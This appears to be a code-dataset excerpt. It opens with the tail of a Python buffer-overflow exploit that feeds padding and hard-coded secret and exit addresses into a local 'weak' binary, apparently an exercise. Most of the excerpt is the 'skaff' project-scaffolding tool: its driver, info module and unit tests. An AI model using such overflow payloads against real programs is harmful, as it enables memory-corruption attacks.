with subprocess.Popen([program], stdin=subprocess.PIPE) as proc:
proc.communicate(padding_byte * buffer_size + secret_byte + exit_byte)
def main():
"""
Main command line driver.
"""
parser = argparse.ArgumentParser()
attr_desc_dict = {
"executable": "path to the 'weak' executable",
"output": "file to store the binary content used for attacking"
}
for flag, msg in attr_desc_dict.items():
parser.add_argument("-" + flag[0],
"--" + flag,
type=str,
required=False,
help=msg)
args = parser.parse_args()
arg_list = None
if all(getattr(args, attr) for attr in attr_desc_dict):
arg_list = [getattr(args, attr) for attr in sorted(attr_desc_dict)]
buffer_exploit(*arg_list)
# -------------------------------- FUNCTIONS ----------------------------------
if __name__ == "__main__":
main()
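# Example invocation (binary and output names are placeholders):
#     python3 exploit.py -e ./weak -o attack.bin
# This binary-searches for the smallest input length that crashes the target,
# writes the padding plus the hard-coded secret/exit addresses to attack.bin,
# and finally replays that payload against the target binary.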
``` |
{
"source": "jhxie/genmake",
"score": 2
} |
#### File: genmake/skaff/driver.py
```python
__all__ = ["skaff_drive"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
import collections.abc
import os
import re
import shutil
import subprocess
import tempfile
from datetime import datetime
from distutils import spawn
from skaff.clitools import (
timed_key_get,
ANSIColor
)
from skaff.config import SkaffConfig
# --------------------------------- MODULES -----------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def skaff_drive(config: SkaffConfig) -> None:
"""
Creates all the necessary subdirectories in addition to the project root.
"""
if not isinstance(config, SkaffConfig):
raise ValueError("'config' argument must be of 'SkaffConfig' type")
for base_dir in config.directories_get():
os.makedirs(base_dir)
for sub_dir in config.subdirectories_get():
os.makedirs(base_dir + sub_dir)
# Create parent directory if it does not exist
os.makedirs("{0}include{1}{2}".format(base_dir,
os.sep,
os.path.basename(base_dir[:-1])))
_license_sign(base_dir, config)
_conf_doc_prompt(base_dir, config)
def _arguments_check(directory, config):
"""
Performs 3 separate checks for the input 'directory' and 'config':
1. Whether 'directory' actually exist in the physical file system.
2. Whether 'config' is a (sub)class instance of 'SkaffConfig'.
3. Whether 'directory' can be obtained by 'directories_get' member function
call.
"""
if not os.path.isdir(directory):
raise ValueError("'directory' must already exist")
if not isinstance(config, SkaffConfig):
raise ValueError("'config' argument must be of 'SkaffConfig' type")
if directory not in config.directories_get():
raise ValueError(("'directory' argument must appear in the result of "
"'directories_get()' member function invocation"))
def _conf_doc_prompt(directory, config):
"""
Prints interactive prompt related to the current 'directory' if 'quiet' is
False.
Calls '_conf_spawn' and '_doc_create()' with the arguments given
afterwards.
"""
_arguments_check(directory, config)
terminal_info = shutil.get_terminal_size()
hints = list()
hints.append("Upcoming Configuration Editing for {0}{1}{2}".format(
ANSIColor.KHAKI, directory, ANSIColor.RESET))
hints.append("The editing will start after [{0}{1}{2}].".format(
ANSIColor.BLUE, "5 seconds", ANSIColor.RESET))
hints.append("Press [{0}c{1}] to continue the editing.".format(
ANSIColor.PURPLE, ANSIColor.RESET))
hints.append("Press [{0}k{1}] to skip the upcoming directory.".format(
ANSIColor.PURPLE, ANSIColor.RESET))
hints.append("Press [{0}a{1}] to skip all the rest.".format(
ANSIColor.PURPLE, ANSIColor.RESET))
key = str()
quiet = config.quiet_get()
if not quiet:
if "posix" == os.name:
os.system("clear")
elif "nt" == os.name:
os.system("cls")
print("-" * terminal_info.columns + "\n")
for line in hints:
print(line.center(terminal_info.columns))
print("\n" + "-" * terminal_info.columns)
try:
while "c" != key.lower():
key = timed_key_get(5)
if "a" == key.lower() or "k" == key.lower():
config.quiet_set(True)
break
except TimeoutError:
pass
if "posix" == os.name:
os.system("clear")
elif "nt" == os.name:
os.system("cls")
_conf_spawn(directory, config)
_doc_create(directory, config)
# Revert the changes if only the current 'directory' is affected
# by the 'quiet' setting
if "k" == key.lower():
config.quiet_set(False)
def _conf_edit(directory, conf_files):
"""
Edits all the 'conf_files' under 'directory' interactively.
By default the environment variable 'EDITOR' is used; if it is empty,
fall back to either 'vim' or 'vi'.
"""
if not directory or not os.path.isdir(directory):
raise ValueError("'directory' must already exist")
if not directory.endswith(os.sep):
directory += os.sep
    if not isinstance(conf_files, collections.abc.Iterable):
raise ValueError("'conf_files' argument must be of iterable type")
elif 0 == len(conf_files):
raise ValueError("'conf_files' argument must not be empty")
# Default to 'vi' or 'vim' if the environment variable is not set.
default_editor = None
editor_candidates = ("vim", "vi", "notepad")
for candidate in editor_candidates:
if spawn.find_executable(candidate):
default_editor = candidate
break
else:
raise RuntimeError("editors not found")
editor = os.environ.get("EDITOR", default_editor)
for conf_file in conf_files:
subprocess.call([editor, directory + conf_file])
def _conf_spawn(directory, config):
"""
Spawns configuration files under the project root directory.
The spawned configuration files in the project root include:
{
".editorconfig", ".gdbinit", ".gitattributes",
".gitignore", ".travis.yml", "CMakeLists.txt"
}
An additional "CMakeLists.txt" will also be spawned in 'src' subdirectory
if it exists.
"""
_arguments_check(directory, config)
language = config.language_get()
quiet = config.quiet_get()
cmake_file = "CMakeLists.txt"
cmake_source_prefix = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"template" + os.sep +\
language + os.sep
sample_source_file = "main." + language
shutil.copy(cmake_source_prefix + cmake_file, directory)
if os.path.isdir(directory + "src"):
shutil.copy(cmake_source_prefix + "src" + os.sep + cmake_file,
directory + "src" + os.sep)
shutil.copy(cmake_source_prefix + "src" + os.sep + sample_source_file,
directory + "src" + os.sep)
# Again, "figuring out where the configuration resides" may belong to the
# responsibility of 'SkaffConfig' class; this responsibiltiy will be
# moved to 'SkaffConfig' after "ini-parsing" functionality is implemented.
conf_files = ("editorconfig", "gdbinit", "gitattributes", "gitignore")
conf_source_prefix = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"template" + os.sep
conf_target_prefix = directory + "."
travis_file = "travis.yml"
travis_source_file = conf_source_prefix + travis_file
travis_target_file = conf_target_prefix + travis_file
language_header = "language: {0}\n".format(language)
for configuration in conf_files:
shutil.copy(conf_source_prefix + configuration + ".txt",
conf_target_prefix + configuration)
with open(travis_source_file, "r", encoding="utf-8") as travis_source:
travis_text = travis_source.read()
with open(travis_target_file, "w", encoding="utf-8") as travis_target:
travis_target.write(language_header)
travis_target.write(travis_text)
if not quiet:
_conf_edit(directory, [cmake_file])
def _doc_create(directory, config):
"""
Creates 'CHANGELOG.md', 'Doxyfile', and 'README.md' template.
Launches $EDITOR or vim on the 'Doxyfile' upon completion, can be turned
off by setting quiet to True.
"""
_arguments_check(directory, config)
changelog_header = (
"# Change Log\n"
"This document records all notable changes to {0}. \n"
"This project adheres to [Semantic Versioning](http://semver.org/).\n"
"\n## 0.1 (Upcoming)\n"
"* New feature here\n"
).format(directory[:-1].title())
readme_header = (
"\n"
"\n## Overview\n"
"\n## License\n"
).format(directory[:-1], os.sep)
changelog_text = directory + "CHANGELOG.md"
copyright_line = "Copyright © {year} {authors}\n".format(
year=datetime.now().year,
authors=", ".join(config.authors_get())
)
license_text = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"license" + os.sep +\
config.license_get() + ".md"
readme_text = directory + "README.md"
with open(license_text, "r", encoding="utf-8") as license_file:
license_markdown = license_file.read()
with open(readme_text, "w", encoding="utf-8") as readme_file:
readme_file.write(readme_header)
readme_file.write(copyright_line)
readme_file.write(license_markdown)
with open(changelog_text, "w", encoding="utf-8") as changelog_file:
changelog_file.write(changelog_header)
_doxyfile_generate(directory, config)
def _doxyfile_attr_match(project_name, line):
"""
Determines whether there is any 'Doxyfile' options available in 'line'.
Return the updated version if 'line' contains options that need to be
changed; otherwise return None.
"""
arguments = (project_name, line)
if not all(argument for argument in arguments):
raise ValueError(("Both 'project_name' and 'line' "
"have to be non-empty 'str' type"))
if not all(isinstance(argument, str) for argument in arguments):
raise ValueError(("Both 'project_name' and 'line' "
"have to be of 'str' type"))
# Gets rid of the trailing separator character
if project_name.endswith(os.sep):
project_name = project_name[:-1]
# Tests whether the length of 'project_name' become 0 after truncation
if not project_name:
raise ValueError("'project_name' cannot be a single slash character")
attr_dict = {"PROJECT_NAME": "\"" + project_name.title() + "\"",
"OUTPUT_DIRECTORY": "." + os.sep + "doc",
"TAB_SIZE": 8,
"EXTRACT_ALL": "YES",
"EXTRACT_STATIC": "YES",
"RECURSIVE": "YES",
"EXCLUDE": "build",
"HAVE_DOT": "YES",
"UML_LOOK": "YES",
"TEMPLATE_RELATIONS": "YES",
"CALL_GRAPH": "YES",
"DOT_IMAGE_FORMAT": "svg",
"INTERACTIVE_SVG": "YES"}
line = line.lstrip()
# If the line is solely composed of whitespace or is a comment
if not line or line.startswith("#"):
return None
for attr in attr_dict:
# '\s' stands for whitespace characters
match = re.match(R"\s*" + attr + R"\s*=", line)
if match:
split_index = match.string.find("=") + 1
return match.string[:split_index] + " " +\
str(attr_dict[attr]) + "\n"
return None
def _doxyfile_generate(directory, config):
"""
Generates or uses existing template 'Doxyfile' within 'directory'.
Launches $EDITOR or vim afterwards if 'quiet' is set to False.
"""
_arguments_check(directory, config)
doxyfile = "Doxyfile"
doxyfile_source_prefix = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"template" + os.sep
doxyfile_target_prefix = directory
doxygen_cmd = ["doxygen", "-g", doxyfile_target_prefix + doxyfile]
quiet = config.quiet_get()
if spawn.find_executable("doxygen"):
# Redirects the terminal output of 'doxygen' to null device
with open(os.devnull, "w") as null_device:
subprocess.call(doxygen_cmd, stdout=null_device)
with tempfile.TemporaryFile("w+") as tmp_file:
with open(doxyfile_target_prefix + doxyfile, "r+") as output_file:
for line in output_file:
match = _doxyfile_attr_match(directory, line)
tmp_file.write(line if not match else match)
tmp_file.seek(0)
output_file.seek(0)
output_file.truncate()
shutil.copyfileobj(tmp_file, output_file)
else:
shutil.copy(doxyfile_source_prefix + doxyfile,
doxyfile_target_prefix + doxyfile)
if not quiet:
_conf_edit(directory, [doxyfile])
def _license_sign(directory, config):
"""
Copies the license chosen by authors to the 'directory', signs it
with authors and current year prepended if applicable; 'directory' must
already exist.
Note only licenses in {"bsd2", "bsd3", "mit"} will be signed by names in
authors.
"""
_arguments_check(directory, config)
copyright_line = "Copyright (c) {year}, {authors}\n".format(
year=datetime.now().year,
authors=", ".join(config.authors_get())
)
# Note "figuring out where the source license resides" may belong to the
# responsibility of 'SkaffConfig' class; this responsibiltiy will be
# moved to 'SkaffConfig' after "ini-parsing" functionality is implemented.
license_source = SkaffConfig.basepath_fetch() +\
"config" + os.sep +\
"license" + os.sep +\
config.license_get() + ".txt"
license_target = directory + "LICENSE.txt"
if config.license_get() in frozenset(("bsd2", "bsd3", "mit")):
with open(license_source, "r", encoding="utf-8") as from_file:
vanilla_license_text = from_file.read()
with open(license_target, "w", encoding="utf-8") as to_file:
to_file.write(copyright_line)
to_file.write(vanilla_license_text)
else:
shutil.copy(license_source, license_target)
# -------------------------------- FUNCTIONS ----------------------------------
```
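A minimal driver sketch for the module above, assuming `SkaffConfig` accepts an iterable of target directories (as in the project's unit tests further below) and supplies defaults for language, license, and authors; the project name is illustrative.
```python
import os

from skaff.config import SkaffConfig
from skaff.driver import skaff_drive

# Trailing separator mirrors the test fixture; the target must not already exist
# because skaff_drive() calls os.makedirs() on it.
config = SkaffConfig(("demo_project" + os.sep,))
config.quiet_set(True)  # skip the interactive $EDITOR sessions
skaff_drive(config)     # scaffolds demo_project/ with license, configs and docs
```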
#### File: genmake/skaff/info.py
```python
__all__ = ["skaff_description_get", "skaff_info_get"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
from datetime import datetime
from skaff import (
__author__,
__email__,
__license__,
__maintainer__,
__version__
)
# --------------------------------- MODULES -----------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def skaff_description_get(short: bool=True) -> str:
"""
Returns the description string of the skaff program.
A concise description will be returned if 'short' is set to True; otherwise
the full version is returned instead.
"""
short_description = "An Extensible Project Scaffolding Tool"
long_description = ("Skaff is a Python library for building programming "
"language dependent scaffolding of software projects, "
"and a command-line tool that uses this library with "
"built-in (CMake-based) C/C++ support.")
if short:
return short_description
else:
return long_description
def skaff_info_get() -> str:
"""
Returns the copyright information string of the skaff program.
"""
module_info_dict = {"author": __author__,
"email": __email__,
"info": skaff_description_get(short=True),
"license": __license__,
"maintainer": __maintainer__,
"version": __version__,
"year": datetime.now().year}
skaff_info = (
"skaff "
"({info}) {version}\n"
"Copyright (C) {year} {author}.\n"
"Licensed and distributed under the BSD 2-Clause License.\n"
"This is free software: you are free to change and redistribute it.\n"
"There is NO WARRANTY, to the extent permitted by law.\n\n"
"Written by {author}.".format(**module_info_dict))
return skaff_info
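# Rough shape of the returned string (actual values come from the package
# metadata imported above):
#   skaff (An Extensible Project Scaffolding Tool) <version>
#   Copyright (C) <year> <author>.
#   Licensed and distributed under the BSD 2-Clause License.
#   ...
#   Written by <author>.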
# -------------------------------- FUNCTIONS ----------------------------------
```
#### File: genmake/tests/config_test.py
```python
import collections
import os
if "posix" == os.name:
import pwd
elif "nt" == os.name:
import getpass
import unittest
from skaff.config import SkaffConfig
from tempfile import TemporaryDirectory
# --------------------------------- MODULES -----------------------------------
# --------------------------------- CLASSES -----------------------------------
class TestConfig(unittest.TestCase):
"""
Unit testing suite for 'config' module.
"""
def setUp(self):
self.tmp_dir = TemporaryDirectory()
if not self.tmp_dir.name.endswith(os.sep):
self.tmp_dir.name += os.sep
# NOTE: the 'directories' argument needs to be an iterable;
# a tuple (denoted by an extra comma inside the parentheses) is used.
self.config = SkaffConfig((self.tmp_dir.name,))
def tearDown(self):
# No need to invoke 'directory_discard' since for each test member
# function a new 'SkaffConfig' instance is created.
self.tmp_dir.cleanup()
def test_authors_set(self):
# The branch where 'authors' is 'None' is tested in 'test_author_fetch'
# member function, so it is skipped here
authors = ["<NAME>", "<NAME>", lambda x: not x]
# Fail due to non-iterable type
with self.assertRaises(TypeError):
self.config.authors_set(authors[-1])
# Fail due to non-containerized string type
with self.assertRaises(TypeError):
self.config.authors_set(authors[0])
# Fail due to empty string
with self.assertRaises(ValueError):
self.config.authors_set((str(),))
# Fail due to the existence of non-string type
with self.assertRaises(TypeError):
self.config.authors_set(authors)
authors[-1] = "\t"
# Fail due to the existence of non-printable string
with self.assertRaises(ValueError):
self.config.authors_set(authors)
del authors[-1]
self.config.authors_set(authors)
self.assertCountEqual(authors, self.config.authors_get())
def test_author_add(self):
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
author_added = "<NAME>"
counter = None
# Fail due to wrong type for the 'author' argument
with self.assertRaises(TypeError):
self.config.author_add(None)
# Fail because the 'author' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.author_add(str())
# Fail because the 'author' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.author_add("\t")
for _ in range(add_count):
self.config.author_add(author_added)
# Success if 'author_add' actually added the specified 'author'
self.assertIn(author_added, self.config.authors_get())
counter = collections.Counter(self.config.authors_get())
# Success if the underlying representation
# for authors does not permit duplicates
self.assertEqual(1, counter[author_added])
def test_author_discard(self):
# Again, this "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
author_discarded = "<NAME>"
# Fail due to wrong type for the 'author' argument
with self.assertRaises(TypeError):
self.config.author_discard(None)
# Fail because the 'author' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.author_discard(str())
# Fail because the 'author' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.author_discard("\t")
for _ in range(add_count):
self.config.author_add(author_discarded)
self.config.author_discard(author_discarded)
# Success if the underlying representation
# for authors does not permit duplicates
self.assertNotIn(author_discarded, self.config.authors_get())
def test_authors_get(self):
authors = ("Pratt", "Whitney")
get_result = None
self.config.authors_set(authors)
get_result = self.config.authors_get()
self.assertCountEqual(authors, get_result)
def test_author_fetch(self):
if "posix" == os.name:
# Get system password database record based on current user UID
pw_record = pwd.getpwuid(os.getuid())
# '_author_get()' must return identical term
# if GECOS field is defined
if pw_record.pw_gecos:
author = pw_record.pw_gecos
if author.endswith(","):
author = author.strip(",")
self.assertEqual(SkaffConfig.author_fetch(), author)
# Otherwise it must match the current user's login name
elif pw_record.pw_name:
self.assertEqual(SkaffConfig.author_fetch(), pw_record.pw_name)
# If none of the above works, 'RuntimeError' is raised
else:
with self.assertRaises(RuntimeError):
SkaffConfig.author_fetch()
elif "nt" == os.name:
author = getpass.getuser()
if author:
self.assertEqual(SkaffConfig.author_fetch(), author)
else:
with self.assertRaises(RuntimeError):
SkaffConfig.author_fetch()
def test_basepath_fetch(self):
basepath = SkaffConfig.basepath_fetch()
self.assertTrue(os.path.isdir(basepath))
self.assertTrue(os.path.isabs(basepath))
def test_directories_set(self):
# Identical to 'test_authors_set' because the similarity between
# the 2 mutator member functions; may be expanded later on if new
# checking branches are added to 'directories_set'
directories = ["Apollo" + os.sep, "Spirit" + os.sep, lambda x: not x]
# Fail due to non-iterable type
with self.assertRaises(TypeError):
self.config.directories_set(directories[-1])
# Fail due to non-containerized string type
with self.assertRaises(TypeError):
self.config.directories_set(directories[0])
# Fail due to empty string
with self.assertRaises(ValueError):
self.config.directories_set((str(),))
# Fail due to the existence of non-string type
with self.assertRaises(TypeError):
self.config.directories_set(directories)
directories[-1] = "\t"
# Fail due to the existence of non-printable string
with self.assertRaises(ValueError):
self.config.directories_set(directories)
# Success
del directories[-1]
self.config.directories_set(directories)
self.assertCountEqual(directories, self.config.directories_get())
def test_directory_add(self):
# Again, identical to 'test_author_add'.
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
directory_added = "Android"
counter = None
# Fail due to wrong type for the 'directory' argument
with self.assertRaises(TypeError):
self.config.directory_add(None)
# Fail because the 'directory' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.directory_add(str())
# Fail because the 'directory' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.directory_add("\t")
for _ in range(add_count):
self.config.directory_add(directory_added)
# Success if 'directory_add' actually added the specified 'directory'
self.assertIn(directory_added + os.sep, self.config.directories_get())
counter = collections.Counter(self.config.directories_get())
# Success if the underlying representation
# for authors does not permit duplicates
self.assertEqual(1, counter[directory_added + os.sep])
def test_directory_discard(self):
# Again, identical to 'test_author_discard'.
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
directory_discarded = "Symbian"
# Fail due to wrong type for the 'author' argument
with self.assertRaises(TypeError):
self.config.directory_discard(None)
# Fail because the 'author' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.directory_discard(str())
# Fail because the 'author' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.directory_discard("\t")
# The path separator will be automatically added in both
# 'directory_add' and 'directory_discard' member functions
for _ in range(add_count):
self.config.directory_add(directory_discarded)
self.config.directory_discard(directory_discarded)
# Success if the underlying representation
# for authors does not permit duplicates
self.assertNotIn(directory_discarded, self.config.directories_get())
self.assertNotIn(directory_discarded + os.sep,
self.config.directories_get())
def test_directories_get(self):
# Test directory names with non-ascii characters
directories = ["Αντικύθηρα" + os.sep, "Ουροβόρος όφις" + os.sep]
get_result = None
self.config.directories_set(directories)
get_result = self.config.directories_get()
self.assertCountEqual(directories, get_result)
def test_language_set(self):
language = "Svenska"
languages = self.config.languages_list()
# Whatever the default programming language is, it must conform to its
# own invariants: the language set automatically must belong to the
# listing of supported languages generated by the class itself.
self.config.language_set(None)
self.assertIn(self.config.language_get(), languages)
self.assertNotIn(language, languages)
with self.assertRaises(ValueError):
self.config.language_set(language)
def test_language_get(self):
# Every language specified in the listing should work.
for language in self.config.languages_list():
self.config.language_set(language)
self.assertEqual(language, self.config.language_get())
def test_languages_probe(self):
pass
def test_license_set(self):
# Identical to 'test_language_set' due to the similarity between
# 'language_set' and 'license_set' mutator functions.
license = "EULA"
licenses = self.config.licenses_list()
self.config.license_set(None)
self.assertIn(self.config.license_get(), licenses)
self.assertNotIn(license, licenses)
with self.assertRaises(ValueError):
self.config.license_set(license)
def test_license_get(self):
# Here 'bsd2' license is chosen to be overridden even though
# those licenses rarely (if at all) need to be "re-defined".
bsd2_text = ("Legal Text to be Written by Lawyers"
"with Some Extra Strings Attached")
bsd2_markdown = (
"Licensed under the BSD 2 Clause License. \n"
"Distributed under the BSD 2 Clause License. \n\n")
bsd2_text_name = self.tmp_dir.name + "bsd2.txt"
bsd2_md_name = self.tmp_dir.name + "bsd2.md"
normalize_funcs = (os.path.basename, os.path.splitext, lambda x: x[0])
system_licenses = None
user_licenses = None
# Every license specified in the listing should work.
for license in self.config.licenses_list():
self.config.license_set(license)
self.assertEqual(license, self.config.license_get())
# The following tests abide by the similar test pattern used in
# 'test_license_list'; but slightly simpler.
# Revert to the default license
self.config.license_set()
system_licenses = self.config.license_get(fullname=True)
with open(bsd2_text_name, "w", encoding="utf-8") as license_text:
license_text.write(bsd2_text)
with open(bsd2_md_name, "w", encoding="utf-8") as license_markdown:
license_markdown.write(bsd2_markdown)
# Add the overridden 'bsd2' license to the internal database
self.config.paths_set(license=self.tmp_dir.name)
self.config.licenses_probe()
user_licenses = self.config.license_get(fullname=True)
# Success if two versions of qualified licenses differ;
# should be the case if 'bsd2' license is successfully overridden
self.assertNotEqual(system_licenses, user_licenses)
# Success if the fully qualified version of the licenses are equivalent
# to each other after removing paths and file extensions
for licenses in (system_licenses, user_licenses):
for index in range(len(licenses)):
for func in normalize_funcs:
licenses[index] = func(licenses[index])
self.assertEqual(system_licenses, user_licenses)
os.remove(bsd2_text_name)
os.remove(bsd2_md_name)
def test_license_sign(self):
chosen_license = "bsd2"
spawned_files = ("LICENSE.txt", "README.md")
self.config.license_set(chosen_license)
# The 'directories' tracked by the 'config' is already created by
# the 'setUp' test fixture method, so a file-existence test can be
# performed directly for 'license_sign'.
self.config.license_sign()
for spawned_file in spawned_files:
self.assertTrue(os.path.isfile(self.tmp_dir.name + spawned_file))
os.remove(self.tmp_dir.name + spawned_file)
def test_licenses_list(self):
licenses = set(self.config.licenses_list(fullname=False))
qualified_licenses = set(self.config.licenses_list(fullname=True))
result_licenses = set()
bsd2_text = ("Random Empty Replacement Text")
bsd2_markdown = (
"Licensed under the BSD 2 Clause License. \n"
"Distributed under the BSD 2 Clause License. \n\n")
bsd2_text_name = self.tmp_dir.name + "bsd2.txt"
bsd2_markdown_name = self.tmp_dir.name + "bsd2.md"
system_config_path = (SkaffConfig.basepath_fetch() + "config" + os.sep)
system_license_path = system_config_path + "license" + os.sep
# Similar to what is done in 'test_licenses_probe',
# sets the 'user' 'license' path to the temporary directory
# so all the licenses created in this test case would be
# automatically removed upon completion (by the 'tearDown')
self.config.paths_set(license=self.tmp_dir.name)
# The number of qualified licenses
# (licenses with fully qualified path and extension) is equal to
# the number of file extensions supported per license * the actual
# number of licenses supported
#
# For example, for the current version 1.0, the supported file formats
# for each license are ".txt" and ".md" (refer to the __LICENSE_FORMATS
# private class attribute for details), if the fully qualified version
# of filenames are needed, then for each file both ".txt" version of
# the license and ".md" version of the license will be returned.
#
# Therefore the length of the 'qualified_licenses' is equal to the
# number of file formats for each license (".txt", ".md") times the
# actual number of license ('licenses' variable here).
self.assertEqual(len(licenses) * 2, len(qualified_licenses))
# Success if the fully qualified version of the licenses are equivalent
# to the originals after removing path and extension.
for license in qualified_licenses:
for func in (os.path.basename, os.path.splitext, lambda x: x[0]):
license = func(license)
result_licenses.add(license)
self.assertEqual(licenses, result_licenses)
# Both text and markdown formats of the overridden license need to
# be present; otherwise 'licenses_probe' will fail
with open(bsd2_text_name, "w") as license_text:
license_text.write(bsd2_text)
with open(bsd2_markdown_name, "w") as license_markdown:
license_markdown.write(bsd2_markdown)
# Success if both overridden license formats are present in the
# fully-qualified result; the stock version of 'bsd2' licenses
# in the 'system' path should not appear in the listing.
self.config.licenses_probe()
overridden_licenses = set(self.config.licenses_list(fullname=True))
self.assertIn(bsd2_text_name, overridden_licenses)
self.assertIn(bsd2_markdown_name, overridden_licenses)
self.assertNotIn(system_license_path + "bsd2.txt", overridden_licenses)
self.assertNotIn(system_license_path + "bsd2.md", overridden_licenses)
os.remove(bsd2_text_name)
os.remove(bsd2_markdown_name)
def test_licenses_probe(self):
zlib_text = (
"This software is provided 'as-is', without any express\n"
"or implied warranty. In no event will the authors be held\n"
"liable for any damages arising from the use of this software.\n\n"
"Permission is granted to anyone to use this software for any\n"
"purpose, including commercial applications, and to alter it and\n"
"redistribute it freely, subject to the following "
"restrictions:\n\n"
"1. The origin of this software must not be misrepresented;\n"
"you must not claim that you wrote the original software.\n"
"If you use this software in a product, an acknowledgement\n"
"in the product documentation would be appreciated but is not "
"required.\n"
"2. Altered source versions must be plainly marked as such,\n"
"and must not be misrepresented as being the original software.\n"
"3. This notice may not be removed or altered from any source\n"
"distribution.\n")
zlib_markdown = (
"Licensed under the Zlib License. \n"
"Distributed under the Zlib License. \n\n")
zlib_text_name = self.tmp_dir.name + "zlib.txt"
zlib_markdown_name = self.tmp_dir.name + "zlib.md"
# Sets the 'user' 'license' path to the temporary directory
# so all the licenses created in this test case would be
# automatically removed upon completion (by the 'tearDown')
self.config.paths_set(license=self.tmp_dir.name)
# License-text only test: fail because the lack of corresponding
# markdown file
with open(zlib_text_name, "w") as license_text:
license_text.write(zlib_text)
with self.assertRaises(FileNotFoundError):
self.config.licenses_probe()
os.remove(zlib_text_name)
# License-markdown only test: fail because the lack of corresponding
# text file
with open(zlib_markdown_name, "w") as license_markdown:
license_markdown.write(zlib_markdown)
with self.assertRaises(FileNotFoundError):
self.config.licenses_probe()
os.remove(zlib_markdown_name)
# Success since there is no new custom license
self.config.licenses_probe()
# Success due to the existence of both text and markdown format
# of the given license
with open(zlib_text_name, "w") as license_text:
license_text.write(zlib_text)
with open(zlib_markdown_name, "w") as license_markdown:
license_markdown.write(zlib_markdown)
self.config.licenses_probe()
self.assertIn("zlib", self.config.licenses_list())
os.remove(zlib_text_name)
os.remove(zlib_markdown_name)
def test_licenses_validate(self):
# Cannot be tested since the 'system' license path is hardcoded
# and within this test suite assumption like
# "the full skaff program is installed properly in the system"
# cannot be made: the test suite may be launched prior to the
# installation of the "skaff" program, if at all.
pass
def test_paths_set(self):
keys = ("config", "license", "template")
random_key = "random"
paths = dict.fromkeys(keys)
# Fail due to 'None' values
with self.assertRaises(ValueError):
self.config.paths_set(**paths)
# Fail due to invalid key-value argument
with self.assertRaises(ValueError):
self.config.paths_set(random_key=random_key)
# Fail due to invalid value argument
paths["config"] = self.tmp_dir.name
paths["license"] = paths["config"] + "license" + os.sep
paths["template"] = 0
with self.assertRaises(ValueError):
self.config.paths_set(**paths)
paths["template"] = paths["config"] + "template" + os.sep
self.config.paths_set(**paths)
self.config.paths_set()
self.assertTrue(all(self.config.paths_get()))
def test_paths_get(self):
keys = ("config", "license", "template")
result_dict = None
result_list = None
# Fail due to 'None' type argument
with self.assertRaises(TypeError):
self.config.paths_get(None)
# Success if the dictionary returned is a deep copy;
# so the internal 'database' would not be accidentally altered
self.config.paths_set()
result_dict = self.config.paths_get()
for key in keys:
result_dict[key] = None
self.assertIsInstance(self.config.paths_get(key), str)
# Success if the list returned contains the corresponding paths
# of the keys given
self.config.paths_set()
result_list = self.config.paths_get(*keys)
for result in result_list:
self.assertIsInstance(result, str)
def test_quiet_set(self):
self.config.quiet_set(None)
self.assertIsInstance(self.config.quiet_get(), bool)
with self.assertRaises(TypeError):
self.config.quiet_set(str())
def test_quiet_get(self):
options = (True, False)
for option in options:
self.config.quiet_set(option)
self.assertEqual(option, self.config.quiet_get())
def test_subdirectories_set(self):
# Identical to 'test_directories_set' because the similarity between
# the 2 mutator member functions; may be expanded later on if new
# checking branches are added to 'subdirectories_set'
subdirectories = ["Opportunity" + os.sep,
"Curiosity" + os.sep,
lambda x: not x]
# Fail due to non-iterable type
with self.assertRaises(TypeError):
self.config.subdirectories_set(subdirectories[-1])
# Fail due to non-containerized string type
with self.assertRaises(TypeError):
self.config.subdirectories_set(subdirectories[0])
# Fail due to empty string
with self.assertRaises(ValueError):
self.config.subdirectories_set((str(),))
# Fail due to the existence of non-string type
with self.assertRaises(TypeError):
self.config.subdirectories_set(subdirectories)
subdirectories[-1] = "\t"
# Fail due to the existence of non-printable string
with self.assertRaises(ValueError):
self.config.subdirectories_set(subdirectories)
# Success
del subdirectories[-1]
self.config.subdirectories_set(subdirectories)
self.assertCountEqual(subdirectories, self.config.subdirectories_get())
def test_subdirectory_add(self):
# Again, identical to 'test_directory_add'.
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
subdirectory_added = "Unix"
counter = None
# Fail due to wrong type for the 'directory' argument
with self.assertRaises(TypeError):
self.config.subdirectory_add(None)
# Fail because the 'directory' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.subdirectory_add(str())
# Fail because the 'directory' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.subdirectory_add("\t")
for _ in range(add_count):
self.config.subdirectory_add(subdirectory_added)
# Success if 'directory_add' actually added the specified 'directory'
self.assertIn(subdirectory_added + os.sep,
self.config.subdirectories_get())
counter = collections.Counter(self.config.subdirectories_get())
# Success if the underlying representation
# for authors does not permit duplicates
self.assertEqual(1, counter[subdirectory_added + os.sep])
def test_subdirectory_discard(self):
# Again, identical to 'test_directory_discard'.
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
subdirectory_discarded = "Multics"
# Fail due to wrong type for the 'author' argument
with self.assertRaises(TypeError):
self.config.subdirectory_discard(None)
# Fail because the 'author' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.subdirectory_discard(str())
# Fail because the 'author' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.subdirectory_discard("\t")
# The path separator will be automatically added in both
# 'directory_add' and 'directory_discard' member functions
for _ in range(add_count):
self.config.subdirectory_add(subdirectory_discarded)
